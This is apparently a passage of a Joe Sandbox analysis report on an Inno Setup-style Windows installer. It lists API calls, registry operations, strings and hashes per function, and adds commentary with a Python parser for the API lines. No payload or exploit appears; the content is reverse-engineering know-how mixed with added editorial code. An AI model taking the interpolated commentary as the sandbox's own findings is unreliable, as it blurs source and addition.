                                                                                            • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 00481E6A
                                                                                            • GetSystemInfo.KERNEL32(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00481E81
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$HandleInfoModuleSystem$CurrentNativeProcess
                                                                                            • String ID: GetNativeSystemInfo$GetSystemWow64DirectoryA$IsWow64Process$RegDeleteKeyExA$advapi32.dll$kernel32.dll
                                                                                            • API String ID: 2230631259-2623177817
                                                                                            • Opcode ID: ee5804469110e506db367347f51c824ce5616b51277ad345f7f2ea83579cd2a3
                                                                                            • Instruction ID: 139b281cd70ff203116dc437a84a2e67e00dfa051846aebc7d59a7e7d95df608
                                                                                            • Opcode Fuzzy Hash: ee5804469110e506db367347f51c824ce5616b51277ad345f7f2ea83579cd2a3
                                                                                            • Instruction Fuzzy Hash: B1110D41504341D4DB2077BA6C45B7F2A8C8B11319F080C3B6C50662F3CA7C8887DBAF

Control-flow Graph

(rendered graph omitted; basic blocks 00472708-00472E5A. The body is a loop over registry entries: a key is opened or created through the 0042DD44 / 0042DD0C wrappers, values are removed with RegDeleteValueA at 00472890 and 004729B7, read with RegQueryValueExA at 00472A87 and written with RegSetValueExA in the 00472B6F, 00472BC4, 00472C4D and 00472C8B blocks, and the key is closed with RegCloseKey at 00472899 or 00472CD9. The 64-bit registry-view and "qword" error strings below belong to the failure branches of these blocks.)
                                                                                            APIs
                                                                                            • RegDeleteValueA.ADVAPI32(?,00000000,?,00000002,00000000,00000000,00472D01,?,?,?,?,00000000,00472E5B,?,?,0049B178), ref: 00472890
                                                                                            • RegCloseKey.ADVAPI32(?,?,00000000,?,00000002,00000000,00000000,00472D01,?,?,?,?,00000000,00472E5B,?,?), ref: 00472899
                                                                                              • Part of subcall function 0047255C: GetLastError.KERNEL32(00000000,00000000,00000000,00472630,?,?,0049B178,00000000), ref: 004725E9
                                                                                            • RegDeleteValueA.ADVAPI32(?,00000000,00000000,00472CF0,?,?,00000000,00472D01,?,?,?,?,00000000,00472E5B,?,?), ref: 004729B7
                                                                                              • Part of subcall function 0042DD0C: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DD38
                                                                                              • Part of subcall function 0047255C: GetLastError.KERNEL32(00000000,00000000,00000000,00472630,?,?,0049B178,00000000), ref: 004725FF
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: DeleteErrorLastValue$CloseCreate
                                                                                            • String ID: Cannot access 64-bit registry keys on this version of Windows$Failed to parse "qword" value$break$olddata${olddata}
                                                                                            • API String ID: 2638610037-3092547568
                                                                                            • Opcode ID: 60c61eb47bec3a2eac8f774f64e080f7387afc8de715dc427226ed339478b351
                                                                                            • Instruction ID: 0e42c6b5a9d89693cebc7f702fd10ac1157821fa568552e70b891395feb5272a
                                                                                            • Opcode Fuzzy Hash: 60c61eb47bec3a2eac8f774f64e080f7387afc8de715dc427226ed339478b351
                                                                                            • Instruction Fuzzy Hash: BE320D74E00248AFDB15DFA9D581BDEB7F4AF08304F448066F914AB3A2CB78AD45CB59

Control-flow Graph

(rendered graph omitted; basic blocks 004684C8-004686FC. The function builds the "%s\%s_is1" key name under Software\Microsoft\Windows\CurrentVersion\Uninstall, opens it through the 0042DD44 wrapper and reads the "Inno Setup: ..." values listed below through 0042DC74, closing the key with RegCloseKey at 004686BA.)
                                                                                            APIs
                                                                                              • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
                                                                                            • RegCloseKey.ADVAPI32(?,004686E2,?,?,00000001,00000000,00000000,004686FD,?,00000000,00000000,?), ref: 004686CB
                                                                                            Strings
                                                                                            • Inno Setup: User Info: Name, xrefs: 00468687
                                                                                            • Inno Setup: Deselected Tasks, xrefs: 00468659
                                                                                            • Inno Setup: User Info: Organization, xrefs: 0046869A
                                                                                            • Inno Setup: Selected Components, xrefs: 004685EA
                                                                                            • Inno Setup: Selected Tasks, xrefs: 00468637
                                                                                            • Inno Setup: No Icons, xrefs: 004685B3
                                                                                            • Inno Setup: Setup Type, xrefs: 004685DA
                                                                                            • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00468527
                                                                                            • Inno Setup: Icon Group, xrefs: 004685A6
                                                                                            • %s\%s_is1, xrefs: 00468545
                                                                                            • Inno Setup: App Path, xrefs: 0046858A
                                                                                            • Inno Setup: User Info: Serial, xrefs: 004686AD
                                                                                            • Inno Setup: Deselected Components, xrefs: 0046860C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseOpen
                                                                                            • String ID: %s\%s_is1$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                                                            • API String ID: 47109696-1093091907
                                                                                            • Opcode ID: bf4e5bcefe0dd369e5494d4ffd3574234bc3bf336502117424754692d6e87e56
                                                                                            • Instruction ID: 9e5fcdcadd17e924e807c4804dd8b09e3b38f40da8ec3e6eb3bcc5aac06a0e07
                                                                                            • Opcode Fuzzy Hash: bf4e5bcefe0dd369e5494d4ffd3574234bc3bf336502117424754692d6e87e56
                                                                                            • Instruction Fuzzy Hash: 7751B570A002089BDB11DB65D9416DEB7F5EF49304FA086BEE840A7391EF78AE05CB5D
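The APIs and Strings entries above are the most useful part of each record, but the sandbox prints them as free text: the argument list continues past the function's real parameters into the stack window, unresolved slots appear as ?, and registry roots are shown as raw handle values (80000002 is HKEY_LOCAL_MACHINE). The parser below is an added example, not part of the Joe Sandbox report or of the sample. It turns such lines into structured calls, resolves the predefined HKEY roots, and fills in the record's %s\%s_is1 format string to give the Inno Setup uninstall key an incident responder would look for on a host. The three sample lines are copied from this report (the first two from the record above, the third from the GetActiveWindow record further down); the regular expression, the HKEY table and the helper names are the author's.

```python
"""Parse the API-call lines of a Joe Sandbox function record into structured data.

Added example, not part of the Joe Sandbox report or of the sample. The sample
lines are copied from the report; the regular expression, the HKEY table and the
helper names are the author's.
"""
from __future__ import annotations

import re
from dataclasses import dataclass, field
from typing import List, Optional

# Predefined registry root handles from winreg.h; 0x80000002 in the record above is HKLM.
HKEY_ROOTS = {
    0x80000000: "HKEY_CLASSES_ROOT",
    0x80000001: "HKEY_CURRENT_USER",
    0x80000002: "HKEY_LOCAL_MACHINE",
    0x80000003: "HKEY_USERS",
    0x80000005: "HKEY_CURRENT_CONFIG",
}

# Matches "• [Part of subcall function XXXXXXXX: ]Api.MODULE(args), ref: XXXXXXXX"
# and the argument-less form "• Api.MODULE ref: XXXXXXXX" that also occurs in the report.
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<subcall>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)


@dataclass
class ApiCall:
    api: str
    module: str
    ref: int                        # address of the call instruction
    args: List[str] = field(default_factory=list)
    subcall: Optional[int] = None   # set when the call lives in a callee of the listed function


def parse_api_line(line: str) -> Optional[ApiCall]:
    """Return the structured call for one APIs line, or None for any other line."""
    m = API_LINE.match(line)
    if m is None:
        return None
    raw = m.group("args")
    return ApiCall(
        api=m.group("api"), module=m.group("module"), ref=int(m.group("ref"), 16),
        args=raw.split(",") if raw else [],
        subcall=int(m.group("subcall"), 16) if m.group("subcall") else None,
    )


def parse_api_lines(lines) -> List[ApiCall]:
    return [c for c in map(parse_api_line, lines) if c is not None]


def decode_hkey(arg: str) -> Optional[str]:
    """Map a hex handle argument to its HKEY_* name; None for '?' or a non-root handle."""
    try:
        return HKEY_ROOTS.get(int(arg, 16))
    except ValueError:
        return None


def registry_target(call: ApiCall) -> Optional[str]:
    """'ROOT\\subkey' for RegOpenKeyEx*/RegCreateKeyEx* calls. Only the first two
    arguments are trusted: the sandbox keeps printing stack slots past the real parameters."""
    if not call.api.startswith(("RegOpenKeyEx", "RegCreateKeyEx")) or len(call.args) < 2:
        return None
    root = decode_hkey(call.args[0])
    return f"{root}\\{call.args[1]}" if root else None


UNINSTALL_BASE = r"Software\Microsoft\Windows\CurrentVersion\Uninstall"


def inno_uninstall_key(app_id: str) -> str:
    """The record's '%s\\%s_is1' format with the Uninstall base path filled in: the key an
    Inno Setup installer reads (and later writes) for a given AppId."""
    return f"{UNINSTALL_BASE}\\{app_id}_is1"


# Constructed input: three lines copied from this report.
SAMPLE_LINES = [
    "  • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\\CurrentControlSet\\Control\\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60",
    "• RegCloseKey.ADVAPI32(?,004686E2,?,?,00000001,00000000,00000000,004686FD,?,00000000,00000000,?), ref: 004686CB",
    "• GetActiveWindow.USER32 ref: 0042F403",
]

if __name__ == "__main__":
    for call in parse_api_lines(SAMPLE_LINES):
        where = f"via 0x{call.subcall:08X}" if call.subcall else "direct"
        print(f"0x{call.ref:08X} {call.api}.{call.module} [{where}] {registry_target(call) or ''}")
```

The subcall marker matters when pivoting from the report to the binary: the RegOpenKeyExA reference 0x42DD60 is inside the helper 0x42DD44, not inside the listed function, so a breakpoint or patch belongs there.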

                                                                                            Control-flow Graph

                                                                                             • Control-flow graph of the function at 0x47B8DC: basic blocks 0x47B8DC to 0x47BA16; calls 0x42C40C, 0x4035C0, 0x47B558, 0x451C38, 0x4529A4, 0x403494, 0x42E2BC, 0x4078FC and 0x403400, plus the API GetProcAddress (the rendered graph with its executed/not-executed block colouring is not reproduced here)
                                                                                            APIs
                                                                                            • GetProcAddress.KERNEL32(74600000,SHGetFolderPathA), ref: 0047B9DE
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc
                                                                                            • String ID: Failed to get address of SHGetFolderPath function$Failed to get version numbers of _shfoldr.dll$Failed to load DLL "%s"$SHFOLDERDLL$SHGetFolderPathA$_isetup\_shfoldr.dll$j]I$shell32.dll$shfolder.dll
                                                                                            • API String ID: 190572456-2632518235
                                                                                            • Opcode ID: 19c183ce3fa01bcadeab013b8c160553b935e57be8875c604a0db8c8468d0ef5
                                                                                            • Instruction ID: 54e288ff13d65e77707e80ace3ca021a5634fe8f765e4003a0d502320fe0c017
                                                                                            • Opcode Fuzzy Hash: 19c183ce3fa01bcadeab013b8c160553b935e57be8875c604a0db8c8468d0ef5
                                                                                            • Instruction Fuzzy Hash: 62311DB0A00249DFCB10EB95D982AEEB7B4EF44308F50847BE554E7352D7389E458BAD

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,0047B723,?,?,00000000,0049A628,00000000,00000000,?,004969FD,00000000,00496BA6,?,00000000), ref: 0047B643
                                                                                            • GetLastError.KERNEL32(00000000,00000000,00000000,0047B723,?,?,00000000,0049A628,00000000,00000000,?,004969FD,00000000,00496BA6,?,00000000), ref: 0047B64C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateDirectoryErrorLast
                                                                                            • String ID: Created temporary directory: $REGDLL_EXE$\_RegDLL.tmp$\_setup64.tmp$_isetup$oI$oI
                                                                                            • API String ID: 1375471231-857235331
                                                                                            • Opcode ID: cbcd31ce72f07627676fb358a31cf6d42b3233dd890dda5219184df80f66688f
                                                                                            • Instruction ID: c69cc1ab8f896661f98e1b5ecb406916ff938ef434e98a02422d0df200dcf9d8
                                                                                            • Opcode Fuzzy Hash: cbcd31ce72f07627676fb358a31cf6d42b3233dd890dda5219184df80f66688f
                                                                                            • Instruction Fuzzy Hash: 45415C34A002099FCB04EFA5D992ADEB7B5EF48309F50843BE51477392DB389E058B99

                                                                                            Control-flow Graph

                                                                                             • Control-flow graph of the function at 0x406334: basic blocks 0x406334 to 0x406381; no subcalls; APIs GetModuleHandleA, GetProcAddress (three times) and SetProcessDEPPolicy (the rendered graph with its executed/not-executed block colouring is not reproduced here)
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,?,00497084), ref: 0040633A
                                                                                            • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00406347
                                                                                            • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 0040635D
                                                                                            • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 00406373
                                                                                            • SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00497084), ref: 0040637E
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$HandleModulePolicyProcess
                                                                                            • String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
                                                                                            • API String ID: 3256987805-3653653586
                                                                                            • Opcode ID: 2d072691014e9b17485d1139902ec2132fd60bbe123d67ee511500e2736c37f1
                                                                                            • Instruction ID: d0a9e1fb4642b92a4408cab99680119fc9d423cfedcded744397bec81fc197df
                                                                                            • Opcode Fuzzy Hash: 2d072691014e9b17485d1139902ec2132fd60bbe123d67ee511500e2736c37f1
                                                                                            • Instruction Fuzzy Hash: C6E026A1380701ACEA1436F20D82F7B10488B40B64B2A14373D5AB91C3D9BDD92459BD

                                                                                            Control-flow Graph

                                                                                             • Control-flow graph of the function at 0x423884: basic blocks 0x423884 to 0x4239BB; calls 0x41F3D4, 0x408CC4, 0x40311C, 0x403738, 0x406300, 0x403400, 0x42365C and 0x424188, plus the APIs GetClassInfoA, RegisterClassA, GetSystemMetrics, SetWindowLongA, SendMessageA, GetSystemMenu and DeleteMenu (the rendered graph with its executed/not-executed block colouring is not reproduced here)
                                                                                            APIs
                                                                                              • Part of subcall function 0041F3D4: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041EDB4,?,0042389F,00423C1C,0041EDB4), ref: 0041F3F2
                                                                                            • GetClassInfoA.USER32(00400000,0042368C), ref: 004238AF
                                                                                            • RegisterClassA.USER32(00498630), ref: 004238C7
                                                                                            • GetSystemMetrics.USER32(00000000), ref: 004238E9
                                                                                            • GetSystemMetrics.USER32(00000001), ref: 004238F8
                                                                                            • SetWindowLongA.USER32(00410660,000000FC,0042369C), ref: 00423954
                                                                                            • SendMessageA.USER32(00410660,00000080,00000001,00000000), ref: 00423975
                                                                                            • GetSystemMenu.USER32(00410660,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C,0041EDB4), ref: 00423980
                                                                                            • DeleteMenu.USER32(00000000,0000F030,00000000,00410660,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C,0041EDB4), ref: 0042398F
                                                                                            • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,00410660,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001), ref: 0042399C
                                                                                            • DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,00410660,00000000,00000000,00400000,00000000,00000000,00000000), ref: 004239B2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Menu$DeleteSystem$ClassMetrics$AllocInfoLongMessageRegisterSendVirtualWindow
                                                                                            • String ID:
                                                                                            • API String ID: 183575631-0
                                                                                            • Opcode ID: 2e18e7cb37a10cc72f1a00071a2b011d07737f2aabe43150d948db026574d78a
                                                                                            • Instruction ID: a1bb8b483c6051ae977dcd30bc5d6258be0549d98267ef4ab912faaf57b8e79c
                                                                                            • Opcode Fuzzy Hash: 2e18e7cb37a10cc72f1a00071a2b011d07737f2aabe43150d948db026574d78a
                                                                                            • Instruction Fuzzy Hash: 463184B17402006AEB10BF65DC82F6636A89B15308F10017BFA40EF2D7CABDDD40876D

                                                                                            Control-flow Graph

                                                                                             • Control-flow graph of the function at 0x42F3D4: basic blocks 0x42F3D4 to 0x42F4E2; calls 0x402D30, 0x402B30, 0x41EEB4, 0x42428C, 0x403738 and 0x403400, plus the APIs GetActiveWindow, GetFocus, RegisterClassA, CreateWindowExA, ShowWindow and SetFocus (the rendered graph with its executed/not-executed block colouring is not reproduced here)
                                                                                            APIs
                                                                                            • GetActiveWindow.USER32 ref: 0042F403
                                                                                            • GetFocus.USER32 ref: 0042F40B
                                                                                            • RegisterClassA.USER32(004987AC), ref: 0042F42C
                                                                                            • CreateWindowExA.USER32(00000000,TWindowDisabler-Window,0042F500,88000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0042F46A
                                                                                            • CreateWindowExA.USER32(00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000), ref: 0042F4B0
                                                                                            • ShowWindow.USER32(00000000,00000008,00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000,00000000,TWindowDisabler-Window), ref: 0042F4C1
                                                                                            • SetFocus.USER32(00000000,00000000,0042F4E3,?,?,?,00000001,00000000,?,00457A52,00000000,0049A628), ref: 0042F4C8
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$CreateFocus$ActiveClassRegisterShow
                                                                                            • String ID: TWindowDisabler-Window
                                                                                            • API String ID: 3167913817-1824977358
                                                                                            • Opcode ID: c7a7adc83155a0351196465afd34f02b227be391187f6a34a24c1e4424dacc7e
                                                                                            • Instruction ID: a85808fe2fc477e6bfefb4b7344e4229cc17534778a3dce562db4a9d559d1a3d
                                                                                            • Opcode Fuzzy Hash: c7a7adc83155a0351196465afd34f02b227be391187f6a34a24c1e4424dacc7e
                                                                                            • Instruction Fuzzy Hash: 6921A371740710BAE220EF619D03F1B76A4EB14B44FA0813BF904AB2D1D7BC6D5486EE

                                                                                            Control-flow Graph

                                                                                             • Control-flow graph of the function at 0x452850: basic blocks 0x452850 to 0x4528E8; calls 0x42E2BC, 0x42E73C and 0x403400, plus the APIs GetModuleHandleA and GetProcAddress (twice each) (the rendered graph with its executed/not-executed block colouring is not reproduced here)
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,004528E9,?,?,?,?,00000000,?,004970C5), ref: 00452870
                                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00452876
                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,004528E9,?,?,?,?,00000000,?,004970C5), ref: 0045288A
                                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00452890
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressHandleModuleProc
                                                                                            • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                                                            • API String ID: 1646373207-2130885113
                                                                                            • Opcode ID: 5506a4263b1eff634ed0d2217251898cb45e1d8087d76cbb7271a2c362ce8048
                                                                                            • Instruction ID: 1764834aba405073ceae9d3f2b1e241b80e40901185f6bd62a0f27775e5f306d
                                                                                            • Opcode Fuzzy Hash: 5506a4263b1eff634ed0d2217251898cb45e1d8087d76cbb7271a2c362ce8048
                                                                                            • Instruction Fuzzy Hash: DB0188B0300300EED701BBA29D03B9B3A58EB56725F50443BF80066287D7FC4909DABD
APIs
• SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 0046693B
• ExtractIconA.SHELL32(00400000,00000000,?), ref: 00466961
  • Part of subcall function 004667D8: DrawIconEx.USER32(00000000,00000000,00000000,00000000,00000020,00000020,00000000,00000000,00000003), ref: 00466870
  • Part of subcall function 004667D8: DestroyCursor.USER32(00000000), ref: 00466886
• ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 004669B8
• SHGetFileInfo.SHELL32(00000000,00000000,?,00000160,00001000), ref: 00466A19
• ExtractIconA.SHELL32(00400000,00000000,?), ref: 00466A3F
Strings
Memory Dump Source
• Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
Similarity
• API ID: Icon$Extract$FileInfo$CursorDestroyDraw
• String ID: c:\directory$shell32.dll
• API String ID: 3376378930-1375355148
• Opcode ID: 7864bbd64ffcc0b4d3402a699463e3004b4bbc59a4beffd4c3fd38ea4829321b
• Instruction ID: bf7570f26ded7c71d3219d2a7bb3c54f33771564a32a8265e6d4c0c3f8c9e6f1
• Opcode Fuzzy Hash: 7864bbd64ffcc0b4d3402a699463e3004b4bbc59a4beffd4c3fd38ea4829321b
• Instruction Fuzzy Hash: A1517070600248AFDB10DFA5CD89FDE77E9EB49344F5181B7B908AB351D638AE80CB59
APIs
• RegisterClipboardFormatA.USER32(commdlg_help), ref: 004307BC
• RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 004307CB
• GetCurrentThreadId.KERNEL32 ref: 004307E5
• GlobalAddAtomA.KERNEL32(00000000), ref: 00430806
Strings
Memory Dump Source
• Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
